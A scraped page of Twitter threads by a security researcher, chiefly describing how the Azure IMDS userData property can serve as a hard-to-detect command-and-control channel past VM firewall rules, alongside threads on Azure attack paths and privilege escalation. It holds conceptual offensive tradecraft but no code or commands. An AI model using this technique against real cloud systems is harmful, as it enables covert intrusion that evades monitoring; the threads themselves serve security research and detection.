Tweet

Andy Robbins

21 Dec, 9 tweets, 3 min read

https://twitter.com/Haus3c/status/1473332599401631752

There are two very interesting new cmdlets in this release:

Invoke-AzureVMUserDataCommand and Invoke-AzureVMUserDataAgent.

In this thread I'll offer my thoughts on how these can be used for extremely hard-to-detect #Azure c2:

https://twitter.com/Haus3c/status/1473332599401631752

This c2 technique is based on Azure IMDS: docs.microsoft.com/en-us/azure/vi….

This service is accessible to every VM in Azure. As far as I know, there's no reason to ever disable this service for a VM, so it should always be accessible to every Azure VM.

IMDS's REST API is available to each VM at the non-routable, local IP of 169.254.169.254.

In April of this year, Microsoft introduced an IMDS feature called "User Data": azure.microsoft.com/en-us/updates/…

This feature allows anyone with write access to the VM object to write to a property called userData. This property must be base64 encoded text, limited to 87,384 characters (which is 65 kilobytes plus the base64 overhead).

The VM itself can read this property, but can't write to it by default. With enough privilege you can grant the VM or anyone else write access to the VM object and therefore the userData property.

Ok. Why is this interesting? This is interesting to me because the IMDS API is *always* available to the Azure VM, regardless of whatever firewall rules you have set up for the VM, the VPC, etc.

Even if the VM is "100% isolated", you can still talk to it through this property.

The Azure substrate and the various services involved will carry your c2 messages for you regardless of firewall rules. C2 traffic is yellow, authentication traffic is in purple:

This c2 method might be very difficult to detect if you are only relying on network telemetry, as I don't believe you can get between the Azure VM and IMDS. Maybe yo can set up a "span" port in the VPC to collect this traffic? Not sure. Anyone know?

@Haus3c

At the host level, @Haus3c has some good info at the bottom of this post, which covers much of the same stuff I just said in this thread: hausec.com/2021/12/03/abu…

• • •

Missing some Tweet in this thread? You can try to force a refresh

This Thread may be Removed Anytime!

Twitter may remove this content at anytime! Save it as PDF for later use!

More from @_wald0

Andy Robbins

@_wald0

21 Dec

🧵In May of 2021, we published our manifesto on a new methodology called Attack Path Management - posts.specterops.io/the-attack-pat….

Enough time has passed now that we are starting to see the outcomes of this methodology, which I'd like to talk to you about:

Strip away the brands, the tools, the people, and everything else, and you are left with the only thing that REALLY matters:

The problem.

The problem that APM seeks to solve is the persistent availability and reliability of attack paths.

Pentesters, red teamers, and real attackers have been abusing attack paths, specifically in Active Directory, for over 20 years. AD attack paths are INSANELY reliable. They can be abused with reliable tools, including legitimate admin tools like Powershell and PsExec.

Read 8 tweets

Andy Robbins

@_wald0

20 Dec

With 2021 almost over, what were some of your favorite blogs, talks, or people you started following this year? I'll go first:

@JohnLaTwC

My favorite overall blog post: "Defenders Mindset" by @JohnLaTwC.

This post is packed with profound insights, from the perspective of someone with decades of deep security experience:

https://twitter.com/JohnLaTwC/status/1462443213587824643

@inversecos

My favorite new follow this year: @inversecos.

Lina is writing the technical content our industry needs: deeply technical, clearly explained, and appropriate for both offense and defense audiences. See her writings here: inversecos.com

Read 7 tweets

Andy Robbins

@_wald0

6 Dec

Let's talk about tiered administration in AzureAD:

- What it starts with
- How it can be violated
- What you can do about that

In 10 tweets or less. Go:

1/ There are three default admin roles that belong to Tier Zero in AzureAD:

Global Admin
Priv. Role Admin
Priv. Auth Admin

Everything IN tier zero is tier zero. Everything ELSE is not tier zero has has no business controlling anything IN tier zero.

2/ These admin roles aren't of much use if you don't grant them to anyone. Let's grant a service principal the Global Admin role:

Read 11 tweets

Andy Robbins

@_wald0

1 Dec

Thread:

API permissions in #Azure can be configured such that attack paths leading to Global Admin emerge. Prior work and links to our work below:

Blog: Azure Privilege Escalation via Azure API Permissions Abuse posts.specterops.io/azure-privileg…

Recording of the talk: specterops.zoom.us/webinar/regist…

Read 7 tweets

Andy Robbins

@_wald0

27 Nov

@JohnLaTwC

Thread:

It was @JohnLaTwC who famously said:

“Attackers think in graphs. Defenders think in lists. As long as this is true, attackers win.”

If you’ve seen more than one of my talks, you might think I’m contractually obligated to include this quote in every talk I do.

This quote means a lot to me. A LOT. Graph theory, to me, almost seems like it was invented solely for the information security field. Its purpose and reach is obviously waaaaaaay further than our field, but…

… we have BARELY scratched the surface of what’s possible with applied graph theory in information security. The core feature of #BloodHound is finding the shortest path between two nodes. The algorithm this is based on was first published in 1959.

Read 13 tweets

Andy Robbins

@_wald0

25 Nov

There are worlds of untapped security research opportunities in Azure - growing, dynamic, and multiplying worlds. The next few years will produce amazing research. Get a head start with the following resources: